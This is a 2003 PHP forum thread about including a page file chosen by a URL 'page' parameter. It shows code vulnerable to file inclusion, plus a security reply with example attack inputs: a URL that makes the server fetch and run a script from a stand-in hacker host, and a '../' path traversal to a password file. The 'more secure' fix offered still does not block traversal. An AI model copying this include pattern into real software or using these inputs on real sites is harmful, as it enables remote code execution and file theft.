Page 1 of 1

question about using variables

Posted: Thu Mar 20, 2003 3:26 am
by legaxy
I've normally used

Code: Select all

elseif ($HTTP_GET_VARSї'page'] === calender) {
require ("calender.php");
to do stuff with index.php?page=calender

but in wanting to go a step further I want to try using

Code: Select all

elseif ($HTTP_GET_VARSї'page'] === $page) {
require ("$page .php");
where $page is the defined variable, and .php makes that... say calender.php
i've tried using a different things for seperation, but no success any help would be greatly appreciated!!

Posted: Thu Mar 20, 2003 3:33 am
by twigletmac
Something like:

Code: Select all

require $page.'.php';
should work.
So should,

Code: Select all

require "$page.php"; // note no space between $page and .php
Mac

Posted: Thu Mar 20, 2003 3:41 am
by legaxy
sweet thanks!, the 1st one worked but the 2nd I had tried before and it returned an error saying can't find

Code: Select all

calender . .php
which was odd
but works now :) thanks,
I'm working on http://www.venturer.org.nz

Posted: Thu Mar 20, 2003 4:19 am
by pootergeist
just a few security notes:

always (and I mean always always and not just sometimes always) hardcode a portion of the path to any include file that receives its pointer from the get array. Even more important now that php4.3+ supports remote file streaming. Imagine I accessed your page and typed blat.php?page=http://mysite.hack/badbad.script - you would call that badbad.script and execute it on your server. Or ?page=../../hidden_files/pwd.txt - there are so many url hacks that you should be aware of.

Now - if you had require('include_files/' .$_GET['page']. '.php');
the script would look for 'include_files/http://...... which wouldn't exist -

Also an idea to set a default value if either $_GET['page'] is null, or the file doesn't exist.

Code: Select all

$_GET['page'] = (file_exists('include_files/' .$_GET['page'] .'.php')) ? 'include_files/' .$_GET['page'] .'.php' : 'include_files/default.php';
require_once($_GET['page']);
Much more secure

All that does is check whether a file exists in the include_files dir named $page.php - if it does it includes it - if it doesn't it includes default.php - so no matter what anyone types into the URL a page is always served and you know exactly what page too.